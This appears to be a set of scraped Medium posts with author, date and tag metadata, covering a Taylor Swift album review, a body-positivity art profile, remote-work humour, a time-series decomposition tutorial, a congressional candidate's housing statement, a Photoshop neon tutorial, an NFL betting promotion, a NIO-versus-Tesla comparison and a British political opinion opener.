The album starts off very solidly with “the 1” and moves into the lone single for this album, “cardigan,” a song that gives off strong Lana Del Rey vibes but is still a great track nonetheless. Taylor makes it clear right from the opening notes of “the 1” what this album is going to sound like. The song that follows, “the last great american dynasty,” is without a doubt my least favorite of the entire album, but it is an oddity in the first half of folklore. On “dynasty” Taylor’s love for fictional poetry becomes too impersonal for its own good, to the point that I’m disinterested in the story. From this point on, though, the album is focused and tight, delivering the best stretch of songs in the whole tracklist. “Exile” with Bon Iver, aka Justin Vernon, sees the indie legend switching lanes himself into the richer, deeper delivery that we rarely get to see. It’s nice to hear Vernon in this style, and the two show impressive chemistry towards the back end of the song. Track five on every Taylor Swift album is traditionally saved for the saddest or heaviest song of the bunch. So on an album like folklore it’s no surprise that “my tears ricochet” packs a particularly powerful punch. Several more solid songs follow — “mirrorball,” “seven,” and “august” — but after those the cracks begin to show.
What once was fresh on the first half of folklore becomes tired and repetitive on the second half. The instrumentals all follow very similar progressions and while the lyricism is still solid there are no great or sticky melodies that carry with the listener. If you asked me to right now, I don’t think I could sing back even one melody from this entire album that I have listened to five times. The closest we get to a catchy melody is the chorus of “cardigan,” or parts of “invisible string.” It is worth saying that you don’t have to have catchy songs for an album to be good, some of my favorite music especially in the indie scene is devoid of traditional melodies. But Taylor’s lyrics and vocals, while not bad, are not mind-blowing enough to carry the more lackluster parts of the album.
Many have pointed out that the obvious issue with the production on folklore is the way Taylor’s vocals are mixed on nearly every song here. They erupt off the track, often dominating the instrumental entirely. It is the way vocals should be mixed on a pop record, not on an indie singer-songwriter album. A more hushed vocal style or a different production choice would have done many of these tracks a favor.
Across the music community, a comparison that many, including myself, have drawn to folklore is Phoebe Bridgers’ newest album Punisher — a comparison that is, quite honestly, unfair to Phoebe Bridgers. If anything, Punisher is what Taylor’s album should sound like, not what it does sound like. Punisher is varied instrumentally and lyrically, with several ear-grabbing moments and a cathartic closing track, while folklore is more like wallpaper indie music, with much simpler instrumentals and vocal performances.
In general on this album the songs are well made in a simple but effective style. There are no instrumentals or vocal deliveries that immediately jump out at you, and this allows Taylor’s lyrics to assume center stage, lyrics that are some of her best in nearly a decade. The issue arises when the instrumentals start to become repetitive and the vocal production issues become more obvious.
Folklore represents a seismic shift not only for Taylor Swift as an artist but for the entire indie genre. Indie folk was once a style of music so underground that the man who pioneered it died penniless. Now that same genre has been cosigned by the biggest pop star on the planet. So while Taylor Swift’s attempt at this once esoteric genre may not be the best or most inventive, it is, for many people, the most accessible.
Rating: 6.5/10
|
https://henrydlong.medium.com/folklore-taylor-swift-album-review-a4317271ea91
|
['Henry Long']
|
2020-07-31 03:09:05.032000+00:00
|
['Taylor Swift', 'Music', 'Review', 'Indie', 'Pop Music']
|
How Sophie Tea Art is painting the path to empowerment.
|
Nudes are a significant part of Tea’s branding, and the paintings on her Instagram are based on real nude photographs that women all around the world have submitted to her. The first day that she asked her followers to send nudes, she saw over 1000 photos being sent, and this number will have only increased over the last year as more and more women pluck up the courage to share their intimate photos. The process of submitting a nude to a stranger may at first seem daunting, but the incredible artwork that they are turned into is the perfect opportunity to see the beauty of your body from an artist’s perspective. You might take a nude on your phone and have the courage to send it to Tea whilst mistakenly believing that your rolls are unflattering, and then later see your nude painted and realise that rolls are a stunning example of contrasting light and dark, like the first image above. The opportunity to send nudes is open to everyone (over the age of 18, of course), so women all around the world can feel the empowerment that comes with embracing your body in all its natural beauty.
Another way that Sophie Tea encourages empowerment through nudity is with her live ‘Send Nudes’ shows, which are known for their jaw-dropping scenes (in many cases, these are probably literal jaws dropping) across London. Women of all ethnicities, ages, sizes, and disabilities strip down and get hand-painted by Tea before showcasing their colourful beauty across the gallery and city. The most recent show took place in October, when Sophie was sadly stuck on the other side of the world in Sydney due to Covid lockdowns. Her team took the lead to manage this amazing feat, with bold strokes of every colour under the sun layered across the volunteers- who are known affectionately as ‘nudies’. The nudies then strutted their stuff all over the city, as a “huge f*ck you to unrealistic female body standards” as they donned only a pair of trainers and a Covid-compliant face mask in Tea’s signature shade of pink. Photos and videos taken by the public, who happened to be in the right place at the right time, showed a group of courageous, powerful women owning every inch of their body and baring it to the streets of London with pride. The energy from the official posts that Tea shared is off the charts: a blend of excitement, pride, and, most importantly, empowerment at seeing women reflective of every walk of life coming together to unapologetically display the magic of the female body to the general public and Tea’s followers.
In conclusion, Sophie Tea Art represents a brand that is innovative, revolutionary, and empowering, with a focus on ensuring that all women embrace every part of themselves. It’s a message that needs to be yelled from every rooftop in the world: love yourself in all your unique and unapologetic glory.
October’s ‘Send Nudes’ show in London. (Credit: Sophie Tea, Instagram)
|
https://medium.com/@holly-berry24/how-sophie-tea-art-is-painting-the-path-to-empowerment-8938af38d2be
|
['Holly Berry']
|
2020-12-21 19:43:44.416000+00:00
|
['Empowerment', 'Art', 'Feminism', 'Body Image', 'Sophie Tea']
|
The Remote Working Dream Is Dead
|
Look, I’ve come out relatively unscathed.
I’ve managed to catch a few lunch dates, and I’ve certainly lived the majority of the year in my pyjamas. And, I don’t have kids — although I do have a husband and two cats who love to interrupt when I’m on a phone call.
So, how can I complain?
Well, there’s still a few universal annoyances that have likely caught all of us ‘remote working dreamers’ out — no matter what our living situation.
The dreaded Zoom call
There’s no denying that Zoom is a lifesaving invention. In times where we can’t hold in-person meetings but need that extra connection, Zoom fixes that issue right up. We can screen share and see all those lovely, friendly faces and facial expressions — although the majority of the time we’re actually staring at our own face.
But when video calls are ‘popped’ into our schedule for things that could be dealt with by way of a one-line email or a quick phone call, that’s when the problems kick in. Zoom anxiety and fatigue are real, and they’ve become a genuinely negative aspect of working from home.
Boundaries. What boundaries?
Remember when we generally used to work from 9am — 5pm, Monday — Friday? Nope, neither do I. Because all of a sudden, since everyone began working from home — regardless of whether you’re an employee or a freelancer — everyone has forgotten that they have a life outside of work.
When I sign off at the end of my working day (because I’ve actually managed to instil some serious boundaries now) I take a big sigh and smile at my empty inbox that I’ve spent all day clearing. I log in at 9am the next morning to what seems like thirty thousand emails across various different email accounts, as all of my clients have decided to spend the night before working.
Soul destroyed.
Where’s my pool float?
Instagram, especially right now, promotes lies.
My idea had been to spend parts of the year lying on a pool lounger in a tropical country, sipping cocktails, and tapping away on my laptop. Because that’s what all the digital nomads do, right?
We won’t address whether I could afford to do this or whether this was a realistic image when I first decided to go freelance, but regardless, the vision that was sold to me has not transpired.
|
https://medium.com/@amycubbon/the-remote-working-dream-is-dead-282b445edcf4
|
['Amy Cubbon']
|
2020-12-23 11:06:53.440000+00:00
|
['Freelancing', 'Humor', 'Work', 'Life Lessons', 'Remote Work']
|
The Basics: Time Series and Seasonal Decomposition
|
Data Science from the Ground Up
The Basics: Time Series and Seasonal Decomposition
Handling time-stamped data is one of the most intuitively obvious use cases for data science. After all, any data we can collect necessarily must be gathered from or represent the past, and we often want to make predictions about unseen cases we’ll encounter in the future, so it makes sense that our models might have an important time component, in some form or other. Time series models are distinct from other sorts of predictive models in that the target variable is both the object of the prediction (for future values) and an input feature of the model (for the historical values).
The first steps in approaching a time series project are frequently to visualize and then decompose the data into trend and cyclical components. From there, you can start to work on more complicated predictive models, though simply decomposing the series can itself yield some valuable insights. This article will focus on the simplest decomposition technique, classical seasonal decomposition, but even this can be quite useful.
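Classical decomposition itself boils down to a few lines: estimate the trend with a centered moving average, average the detrended values by season, and treat what's left as the residual. Here is a minimal additive sketch — the data is synthetic, and for simplicity it assumes an odd seasonal period:

```python
def classical_decompose(series, period):
    """Additive classical decomposition: series ≈ trend + seasonal + residual.
    Assumes an odd period so the centered moving average is symmetric."""
    n, half = len(series), period // 2
    trend = [None] * n  # undefined at the edges, where no full window fits
    for i in range(half, n - half):
        window = series[i - half : i + half + 1]
        trend[i] = sum(window) / len(window)
    # Seasonal component: mean detrended value at each position in the cycle.
    buckets = [[] for _ in range(period)]
    for i in range(n):
        if trend[i] is not None:
            buckets[i % period].append(series[i] - trend[i])
    seasonal = [sum(b) / len(b) for b in buckets]
    return trend, seasonal

# Synthetic data: a flat level of 10 plus a repeating +2/0/-2 swing, period 3.
data = [12, 10, 8, 12, 10, 8, 12, 10, 8]
trend, seasonal = classical_decompose(data, 3)
```

On real data you would typically reach for a library routine instead, but the mechanics are exactly this: the moving average smooths the cycle away, and the leftover per-season averages are the seasonal pattern.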
When are time series techniques appropriate?
Nowadays, most data, particularly procedurally generated data, comes with a timestamp. Whenever a digital form is filled out and submitted, or whenever a purchase is made online, the exact time is typically recorded and stored. As a result, many datasets come with a time element of some nature, but that doesn’t mean that the time series techniques discussed here are necessarily appropriate. These techniques only really make sense when there is some degree of auto-correlation in the target variable, that is, when the target variable is correlated with itself from earlier periods. If a value from yesterday or last month, or last year can help you predict the value for today, then these time series techniques are appropriate. If that isn’t the case, then they won’t help.
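That test can be made concrete by computing the lag-1 autocorrelation directly and checking whether it is meaningfully different from zero. The sketch below uses a synthetic random walk rather than real market data, contrasting a price-like level with its day-to-day changes:

```python
import random
import statistics

def lag1_autocorr(series):
    """Pearson correlation between the series and itself shifted by one step."""
    x, y = series[:-1], series[1:]
    mx, my = statistics.mean(x), statistics.mean(y)
    cov = sum((a - mx) * (b - my) for a, b in zip(x, y))
    sx = sum((a - mx) ** 2 for a in x) ** 0.5
    sy = sum((b - my) ** 2 for b in y) ** 0.5
    return cov / (sx * sy)

random.seed(0)
changes = [random.gauss(0, 1) for _ in range(1000)]  # "day-to-day moves": pure noise
price, level = [], 100.0
for c in changes:                                    # the "price" is their running sum
    level += c
    price.append(level)
```

The running level comes out highly autocorrelated, while its day-to-day changes show essentially none — mirroring the Apple example that follows.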
Consider, for instance, the day to day movements in stock prices, which are famously random. Knowing that a stock went up yesterday doesn’t really tell you whether the stock is likely to go up today. Here, for example, is a real life example of day to day stock price movements:
The day to day change in a certain stock’s price. Not really appropriate for time series analysis
The company in question is actually Apple, but you wouldn’t be able to tell that just by looking at the day to day movements — like all stocks, Apple’s bounces around from day to day in a way that defies prediction. Time series analysis won’t help.
Now, instead of looking at the day to day movement in price, let’s consider the stock price itself. Unlike the day to day change, the price does exhibit autocorrelation. Yesterday’s stock price gives me a very good indication of what today’s stock price will be because the price typically doesn’t change by more than a percent or two in any given day. If the price was $200 yesterday, I can be pretty sure it’ll close between $190 and $210 today, barring exceptional events. Out of the seeming noise of the day to day movements, the price itself exhibits a trend that suggests time series analysis might be useful:
The actual price of Apple stock. Maybe appropriate for time series analysis?
But then, stock prices are still stochastic in nature and while there might be some benefit in smoothing out a graph like this depending on what sort of analysis you’re doing, you’re going to have a hard time actually predicting future values. So, let’s consider one final Apple related series, the number of iPhones sold globally each quarter:
Number of iPhones sold each quarter. Definitely appropriate for time series analysis
Now, this is a time series we can work with! Notice that it doesn’t just exhibit a general trend, but also has predictable cycles within the trend — you’ll see a spike in sales each year corresponding with Apple’s first quarter (their accounting year starts in October, so their first quarter is picking up holiday sales). The goal of our time series techniques is often to find and exploit predictable patterns like this, even when the patterns are subtler and harder to spot than the seasonal pattern in iPhone sales.
Rolling averages and trends in time series
A common first step when approaching a new time series project is to smooth out the data with something like a rolling average. This has two main benefits. One is that real world data tends to jump around a bit, even if there is a clear underlying trend, and looking at the rolling average makes it easier to tell how the trend is moving underneath the noise. Second, finding a trend in this or a similar manner is the first step towards creating a seasonal decomposition. Let’s look at a real example. Here is a common starter time series data set, which shows the number of airline passengers there were per month in the US in the fifties:
Air travel boomed in the 1950s
There’s obviously an upward slope as air travel went from a relatively rare luxury in the late 40s to a much more common experience in the 60s, but there’s also clearly a seasonal pattern, with travel being consistently higher in some months than in others. The month to month variation makes it hard to see exactly how fast this growth is. We can smooth out the monthly fluctuations by considering a rolling average, where a few consecutive months are considered together. A particularly high or low value in one month will, therefore, be tempered by the less extreme values of the other months in the rolling window. Consider the original data alongside a six month rolling average:
Our data with a 6 month rolling average
The rolling average doesn’t get as high as the original data at its peaks, or as low during the troughs. One thing you may notice about this particular example is that it also doesn’t seem to hit the peaks and troughs at exactly the same time as the original data. This rolling average is more specifically a trailing average: the six months that make up the average for a given month are that month’s point and the five preceding months. As an alternative, you might consider centering your window on the month. You could, for instance, consider the month itself, the two previous months and the two subsequent months for a 5 month window (centering tends to work better with odd numbers of months). This gives a slightly smaller window, but one that coincides with the peaks and troughs of the data rather than lagging them by a month or so:
Comparing rolling windows of equal length but different centers
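In pandas, the difference between the two is just the `center` flag on `rolling`. A minimal sketch, using the first two years of the classic airline passengers series as stand-in data:

```python
import pandas as pd

# First two years of the classic monthly airline passengers series,
# used here only to compare trailing vs. centered windows.
passengers = pd.Series([112, 118, 132, 129, 121, 135, 148, 148, 136, 119, 104, 118,
                        115, 126, 141, 135, 125, 149, 170, 170, 158, 133, 114, 140])

trailing = passengers.rolling(window=6).mean()               # month + 5 preceding
centered = passengers.rolling(window=5, center=True).mean()  # month +/- 2 months

# The trailing average lags the data's peaks; the centered one lines up
# with them but is undefined at both edges of the series.
print(trailing.isna().sum(), centered.isna().sum())  # -> 5 4
```

Note the NaN counts: the trailing window is undefined for the first five months, while the centered window loses two months at each end of the series.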
You might be able to see already, that this strategy has an issue when you get towards the end of your data set — you can’t consider the average of a future month for which you have no data yet! In the above example, the centered rolling average simply stops two months before the end of the dataset while the trailing average goes all the way to the edge. There are some ways to deal with this — perhaps as you get towards the end and start running out of future months, you start to consider fewer months to close the gap — but these may not be satisfactory. (Of course, the trailing average also has a similar problem, but one at the beginning of the series, where you can’t take an average of the last 6 months if you’re only in, say month 2 or 3 of the data set.)
You can also vary the size of the window to adjust how much smoothing you do. As you increase the window, the rolling average will get less and less peaky:
Comparing windows of various size
There are a few other ways of smoothing out time series and finding trend lines, but they tend to be variations on the theme of the simple average. A common one worth mentioning is the Exponentially Weighted Moving Average (EWMA), which, true to its name, averages previous periods but weights them so that the more recent periods count for more in the average.
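A hedged sketch of the EWMA in pandas (the span value here is an arbitrary choice for illustration):

```python
import pandas as pd

# One year of illustrative monthly values.
passengers = pd.Series([112, 118, 132, 129, 121, 135, 148, 148, 136, 119, 104, 118])

# EWMA with a 6-period span: alpha = 2 / (span + 1), so each month's
# weight decays geometrically the further back in time it is.
ewma = passengers.ewm(span=6, adjust=False).mean()

# Unlike a fixed 6-month window, the EWMA is defined from the very first
# point and responds more quickly to recent changes.
assert ewma.notna().all()
```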
Classical Seasonal Decomposition
One use of creating a smoothed trend line in this fashion is to perform seasonal decomposition: breaking the original data into components for the trend, the cyclical deviations from that trend, and whatever residuals are left over. How do we go from a smoothed line to the full decomposition? Well, notice that as you increase the size of the rolling average’s window, the impact of the seasonal fluctuations fades away. If your rolling average considers a window that is the same size as your seasonal cycle, it essentially washes out the seasonal cycle altogether by considering one of each month in the cycle:
The 12 month rolling average doesn’t really have ‘seasons’ anymore
We’re looking for a seasonal cycle that accounts for the differences between the original data and this season-less rolling average. There are two ways to try to calculate this seasonal element. The first is as an additive model. In this method, we’ll imagine that the true value for any given month is the value of the trend at that month plus a static seasonal value that changes from month to month within a year but stays roughly the same for the same month in consecutive years, with some (hopefully small) amount of error left over. Let’s start by calculating a ‘de-trended’ series: taking our original series and subtracting the trend from it:
Our de-trended series. Spoiler: the fact that the amplitude of the seasonal pattern grows is a bad sign
This de-trended series shows us just the seasonal cycle along with whatever other noise there is in our data set. Now we can simply consider each month within the cycle one by one. How much above or below the trend is the average January data point? Or the average February? We can simply take a month by month average to get an approximation of the seasonal cycle:
Our seasonal component
Looking at these average seasonal components like this, you can see clearly how air travel varied from month to month, with much more travel in the summer months than in the winter. Now we can model our original data as being composed of the trend and this seasonal component:
Putting together our trend and seasonal component
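The whole additive pipeline can be sketched in a few lines of pandas. This is a simplified illustration on synthetic monthly data, not the article's exact code; textbook treatments often use a "2x12" double average for even periods, while this sketch keeps a plain centered window:

```python
import numpy as np
import pandas as pd

# Synthetic three-year monthly series: linear trend + fixed seasonal
# offsets + a little noise (all numbers made up for illustration).
idx = pd.date_range("1949-01-01", periods=36, freq="MS")
season_true = np.tile([-25, -15, -5, 5, 15, 25, 25, 15, 5, -5, -15, -25], 3)
rng = np.random.default_rng(0)
y = pd.Series(np.linspace(110, 170, 36) + season_true + rng.normal(0, 2, 36),
              index=idx)

# 1. Trend: a 12-month centered rolling average washes out the seasonality.
trend = y.rolling(window=12, center=True).mean()

# 2. De-trend by subtraction (the additive model).
detrended = y - trend

# 3. Seasonal component: average the de-trended values month by month.
seasonal = detrended.groupby(detrended.index.month).mean()

# 4. Model each point as the trend plus that month's seasonal offset.
modeled = trend + pd.Series(y.index.month, index=idx).map(seasonal)
```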
Our modeled data in the green line isn’t horrible, but it’s clearly got a problem — it consistently overshoots in the early years and consistently undershoots in the later years. Actually, we could have foreseen this problem arising when we graphed out the de-trended data and saw that the seasonal swings got more and more extreme. In this case there is a simple fix, which is to consider the second way of decomposing the time series, the multiplicative model.
The multiplicative model works similarly to the additive one, except in this case we say that the final data for any given month is some value from the trend multiplied by some seasonal adjustment that stays roughly the same year over year. The additive model says something like “the number of flights is typically 40,000 higher than the trend in June”, while the multiplicative model says “the number of flights is typically 10% higher than the trend in June”. In this way, the multiplicative model scales the size of the seasonal cycle as the trend rises or falls.
Calculating the multiplicative seasonal cycle is similar to calculating the additive one, except that to find the de-trended series, we divide the original data by the trend:
The multiplicative de-trended series. Notice it no longer grows in amplitude as time goes on
We can find the monthly adjustments by averaging each month of this de-trended series, and then model out our data as the trend multiplied by the appropriate seasonal adjustment:
Much better!
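The multiplicative variant needs only two small changes to the additive sketch: divide by the trend instead of subtracting it, and multiply the factors back in. Again a hedged illustration on synthetic data whose seasonal swings grow with the trend, as the airline data's do:

```python
import numpy as np
import pandas as pd

# Synthetic series: linear trend times fixed monthly factors, plus noise.
idx = pd.date_range("1949-01-01", periods=36, freq="MS")
factors_true = np.tile([0.8, 0.85, 0.95, 1.0, 1.05, 1.2, 1.25, 1.2,
                        1.05, 0.95, 0.9, 0.8], 3)
rng = np.random.default_rng(1)
y = pd.Series(np.linspace(110, 200, 36) * factors_true * rng.normal(1, 0.01, 36),
              index=idx)

trend = y.rolling(window=12, center=True).mean()

# De-trend by division: each point becomes a ratio to the trend.
ratios = y / trend

# Average the ratios month by month, e.g. "July runs ~25% above trend".
seasonal = ratios.groupby(ratios.index.month).mean()

# Model each point as the trend times that month's seasonal factor.
modeled = trend * pd.Series(y.index.month, index=idx).map(seasonal)
```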
You might already be able to tell that successfully decomposing a time series in this fashion depends crucially on properly identifying the period of the seasonal cycle. Is it a yearly cycle? Or does it take two years? Or only 6 months? Oftentimes there are clear calendar cycles — week to week, month to month or year to year — but depending on what sort of data you are working with, there might not be any reason for it to conform to the calendar. Choosing an inappropriately sized period will render your decomposition functionally useless.
As an example, imagine you were looking through a data set like the one we’ve been considering, but you didn’t know what it represented and didn’t assume that it had an even yearly period of 12 months. What happens if you select an 11 month period instead of a 12 month one? Well, at first things seem to be going ok. When you plot out your rolling average, it looks like you’ve more or less removed the seasonality:
An 11 month rolling average seems to work just fine…
When you perform the rest of your steps to decompose the series along the 11-month period, however, you quickly see that something isn’t right:
Well, as models go, this isn’t very helpful
This seasonal decomposition is basically useless, adding no real value above the smoothed out trend line. As you can see, classical decomposition really depends on finding a sensible value for the period.
Classical decomposition may seem simple, and in a way it is (and old-fashioned to boot, having been developed in the 1920s). Yet, hopefully, you can see that, simple as it is, it can be fairly powerful, modeling our data well. It may also be clear how you can extend this sort of technique to start predicting future values, drawing out the trend a few extra months and applying the appropriate monthly adjustment.
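A minimal sketch of that forecasting idea, with made-up stand-ins for the trend endpoint, slope, and monthly factors you would estimate from a real decomposition:

```python
import numpy as np
import pandas as pd

# Hypothetical multiplicative monthly factors (indexed 1-12) and a
# hypothetical fitted trend: last smoothed value plus a monthly slope.
seasonal = pd.Series([0.8, 0.85, 0.95, 1.0, 1.05, 1.2, 1.25, 1.2,
                      1.05, 0.95, 0.9, 0.8], index=range(1, 13))
last_trend, slope = 200.0, 2.5

# Extend the trend in a straight line, then reapply each month's factor.
future = pd.date_range("1952-01-01", periods=6, freq="MS")
trend_ext = last_trend + slope * np.arange(1, 7)
forecast = pd.Series(trend_ext * seasonal.loc[future.month].to_numpy(),
                     index=future)
print(forecast.round(2))
```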
It’s also worth bearing in mind how it captures the time series process in general: try to isolate the trend, look for predictable patterns, and account for them. You can then look for explanations for any significant deviations. There are more complicated ways of isolating trends, but they will all, basically by necessity, look at multiple points in time to try to separate the trend from the day to day, week to week, or month to month variation. There are more advanced methods for finding predictable patterns in the de-trended data, including methods that consider multiple patterns of different periods happening at the same time, but in principle they work much the same way.
In my next post on time series, I’ll profile some of these more advanced methods and how they can be extended for predicting future values.
|
https://towardsdatascience.com/the-basics-time-series-and-seasonal-decomposition-b39fef4aa976
|
['Max Miller']
|
2020-03-19 04:15:06.709000+00:00
|
['Seasonal Decomposition', 'Time Series', 'Data Science Ground Up', 'Time Series Analysis', 'Data Science']
|
Public Housing Green New Deal Act Statement
|
Stanley Isaacs Houses
Statement on Rep. Alexandria Ocasio-Cortez and Sen. Bernie Sanders’s Public Housing Green New Deal Act:
To end the housing crisis, it’s crucial that we fully fund and fix our publicly owned homes in a way that empowers residents, upholds strong labor standards, and addresses the challenges of climate disaster head-on. Rep. Alexandria Ocasio-Cortez and Sen. Bernie Sanders’s Public Housing Green New Deal Act would be an important part of making sure that public housing, one of our most threatened sources of deeply and permanently affordable housing, remains livable, safe, and sustainable for years to come.
In New York City and across the country, the condition of our public housing stock, long starved of much needed and deserved federal funding, is dire. Just last week, 5,500 NYCHA residents were left without heat as the boilers failed in 23 buildings across 3 different developments. This is nothing new, as residents, the vast majority of whom are people of color, are routinely at risk from mold, lead paint, lack of heat and hot water, and buildings urgently in need of structural repairs. What’s more, a significant portion of NYCHA’s portfolio is located in flood zones and is extremely vulnerable in the event of extreme weather and sea level rise.
The Public Housing Green New Deal Act addresses these problems in a number of innovative ways. Through 7 different federal grant programs, the act would decarbonize the United States’ entire public housing stock, provide funding for renewable community energy production, improve resiliency measures, ensure all tenants have a say in their building and development through the strengthening of resident councils, and provide good paying jobs and economic opportunities for residents. Importantly, this act also repeals the Faircloth Amendment, which currently prohibits the construction of new public housing units, allowing us to build the new non-speculative homes that we need.
Public housing isn’t a failure. Over the past decades, our state and federal governments have systematically disinvested from our public housing authorities while pushing privatization programs like RAD that put residents at risk of rising rents and eviction. Under the Green New Deal, these developments can instead be transitioned into a model for sustainable and equitable housing while centering the needs of residents who have long been ignored.
As this act makes clear, Housing is a human right. No one should have to live in substandard conditions. In Congress, I will be a tireless advocate for homerenters, especially those living in publicly owned homes, as we fight for a Green New Deal for Cities and a Homes Guarantee.
In Solidarity,
Peter Harrison
Democratic candidate for NY-12
www.peterfornewyork.com
|
https://medium.com/@peterfornewyork/public-housing-green-new-deal-act-statement-2add1c18c66d
|
['Peter Harrison']
|
2019-11-14 13:18:21.066000+00:00
|
['Public Housing', 'Alexandria Ocasio Cortez', 'Bernie Sanders', 'Green New Deal', 'Housing']
|
And there was Neon Light!
|
As I ventured on in discovering my own style of photography, I came to realize the limits of my skills and reevaluated myself to get over my shortcomings. One of these shortcomings was my poor use of light sources and lighting in general. Photographer Calop had been my teacher, showing me new techniques and ideas I was able to use in my photos. I learned to use Adobe products such as Photoshop and Illustrator to edit photos and illustrations, respectively.
With newfound knowledge, I began to apply photo manipulation to my edits, starting with the addition of artificial lighting. I made neon-like illustrations and added them on top of photos as light sources. Being able to do this type of editing made me realize the importance of post-processing. I was able to apply ideas that I wasn’t able to before. With photo manipulation, I had the power to add light objects to photos and even paint in highlights as well as shadows. One of my early projects involved transforming the time of day; I wanted to utilize the neon illustrations I made, so I turned the photos to look as if they were shot at night and added in neon objects for style.
First, transform the photo from day to night.
·Use this tutorial as your guide: https://www.facebook.com/100059001435222/videos/pcb.107474634562584/107324377910943/
How to: Paint Lights
· Add new layer and choose the brush tool.
· Choose color of light. (Use light colors and consider the environment of the image.)
· Paint the spot where the light would be in.
· After brushing, click Filter, then Blur, then Gaussian Blur. Blur the paint slightly to lessen its sharpness.
· Then duplicate the Layer of the brush twice. (ctrl+J or cmd+J)
· Use a slightly higher value of Gaussian blur on one duplicated layer. High enough to have a glow effect on the surrounding of the brush.
· Then do the same on the other duplicated layer but with a higher value to give highlight to its surroundings.
How to: Add Neon Lights
· Add new layer and design the desired neon light with the brush or shape tool.
· The color should be white (for now), and the lines, thin enough to be distinguished as neon.
· After designing, give a slight amount of blur just like the light paint before.
· Duplicate them as well with the same amount of blur (the amount depends on size and personal preference), but now change the duplicated layer’s color to the neon light’s intended color.
Tips for adding neon objects to photos in Photoshop
· Analyze and distinguish possible surfaces of the photo; add highlights and shadows to surfaces that may and may not be hit by the neon object to be added. This can be done using the paint tool and masking.
· Give the neon objects a radiant glow using blur (try Gaussian) and blending it to smooth out the shine; this helps in giving the lights a feeling of realness.
· It is advisable to crop out little details that may have an effect on the intended mood of the photo edit. These may include people in the background and other lights that may distract from the subject. This can be done using various methods such as the paint tool, fills, and smudging.
· Give the eyes the glow they’re supposed to have.
What’s most important in the process of photo-manipulation is the photographer being able to express what he/she wants that can’t evidently be seen through a simple, raw photo. Alongside aesthetics and stories, photographers search for feelings they want to express. I believe that the manipulation of photos allows me to create new expressions I deem personal and worthy of audience appeal. There is no limit to creativity; a good photographer will utilize both ideas and technology to their full potential.
|
https://medium.com/@gawaniemman/and-there-was-neon-light-91271e5bfbbc
|
['Emmanuel Gregorio']
|
2020-12-14 03:11:15.380000+00:00
|
['Photoshop', 'Light', 'Editing', 'Light Painting', 'Photography']
|
Bet $5 Win $150: Browns at Packers
|
Christmas is upon us and FanDuel Sportsbook has an awesome gift for new users. Sign up before or on Christmas day and get 30/1 odds on any team playing on Christmas day to win their game https://bit.ly/Bet5WIN150 One particular matchup where this makes a ton of sense is when the Browns and Packers meet at Lambeau Field.
When the NFL schedule was released, it wouldn’t have been outlandish to assume these teams would be in each other’s shoes at the moment, as Cleveland entered the year with short Super Bowl odds and Aaron Rodgers retirement rumors still abounded. Fast forward to now: Cleveland is coming off a heartbreaking home loss to the Raiders with Nick Mullens behind center and many other regulars out due to COVID protocols, while the Packers extended their win streak to 3, improving to 11–3 and clinching the NFC North title.
The Browns have been one of the most inconsistent teams in the NFL this season; after losing to Arizona in week 6, they have alternated wins and losses in every game since. The Packers are as healthy as they’ve been all season and, besides some defensive lapses over the last 4 weeks, have been quite possibly the best team in the league. Green Bay has also been really good at home, winning all 6 of their games by an average of almost 14 points. With news as I write this that Browns center J.C. Tretter is going on the COVID list, the Browns’ chances of receiving coal on Saturday seem even more likely. Backtracking to the Packers’ recent defensive struggles, the teams that exposed them had either dynamic skill players or a mobile QB; the Browns possess neither of these traits at this time.
It’s clear who the better team is here, and I fully expect the Packers to dominate on Saturday. Although the last big favorite I backed (Tampa Bay -10.5) didn’t work out too well for me, I’m confident that Aaron Rodgers & Co. are fully committed to that #1 seed in the NFC and will not repeat the same mistakes from last week. Give me Packers -7.5 *(as of Noon 12/23)
However, to make your Christmas even better, take advantage of the FD Sportsbook offer I referenced and get 30/1 odds on Green Bay just to win as your first bet. Sign up and make Christmas a winning one by using the link below.
|
https://blog.fantasylifeapp.com/bet-5-win-150-browns-at-packers-f46a437ea5e
|
[]
|
2021-12-23 17:29:26.030000+00:00
|
['Sports Gambling', 'Sports', 'NFL', 'Sports Betting', 'Fanduel Sportsbook']
|
Will Chinese EVs pull a TikTok on Tesla?
|
By now we are all familiar with the growth story of TikTok and how it grew far faster than all the Western social networks. Chinese EV stocks have now been on a massive bull run, and yesterday, possibly the most hyped EV company, NIO, announced their 2020 Q3 results:
Sales increased 147% YoY, margins finally went positive, all that good stuff.
But how does young NIO compare to Tesla’s early days? The deliveries per quarter tell the growth story:
Deliveries Data: Link
After 10 quarters of deliveries, NIO is sitting at a rate of 12.2k deliveries per quarter. In contrast, by the end of Tesla’s first 10 quarters of delivering cars (back in Q4 2014), it had hit a rate of 9.8k deliveries per quarter.
NIO’s deliveries have been growing at an average rate of 40% QoQ, versus Tesla’s deliveries back in the day growing at 20% QoQ. This is despite NIO’s early ramp having to deal with the pandemic, yet it still managed to beat the young Tesla’s pace.
So who is winning? It’s hard to tell right now. As Tesla has shown us, linear growth and exponential growth look the same in the early days. NIO’s CEO William Li talks about raising production quantities in 2021 to 150k-300k per annum (37.5k-75k per quarter), this would put NIO way ahead of Tesla’s historic ramp up.
The assumption is that the Chinese market is bigger (just based on population), but also easier to build up: Wealth is spread much less evenly in China in contrast to North America or Europe. Most of Chinese EV customers are located in coastal cities, while rural China is poor in comparison. This means that current EVs with not-so-great range present a stronger value proposition, and the reach of the charging network does not have to be as extensive as that of the US.
While NIO gets to lean on the technology and product awareness Tesla developed over the years, they also have to deal with the increased pressure of directly competing with it as well as many other Chinese EVs (Li, XPeng, BYD, et al).
A wave of price cuts for Tesla’s MIC (Made in China) vehicles is on the horizon as they continue to ramp up production. The price cuts could be greater than expected, with rumours of a Lithium Iron Phosphate battery pack in the cards for Tesla. This chemistry was previously written off for its low performance, but the increased efficiencies of powertrains and the pursuit of cheaper EVs may have made it viable again. This would be a strong blow to NIO’s momentum, stirring up an intense rivalry.
|
https://medium.com/@getmeflyingcars/will-chinese-evs-pull-a-tiktok-on-tesla-bf0a72777971
|
['Gonzalo Espinoza Graham']
|
2020-11-19 01:48:02.640000+00:00
|
['Tesla', 'Electric Vehicles', 'Tech', 'Electric Car', 'China']
|
British democracy is caving in on itself. Merry Christmas.
|
The British public has not even begun to understand the seriousness of what is happening to our country. This recent warning from Lord Sumption in a law lecture was an alarm for all those interested in preserving our democracy.
As 20 million people are under stay at home orders for Christmas, via another last-minute Ministerial diktat delivered via a press conference, and even the world’s borders are refusing us, alarms must ring louder than ever.
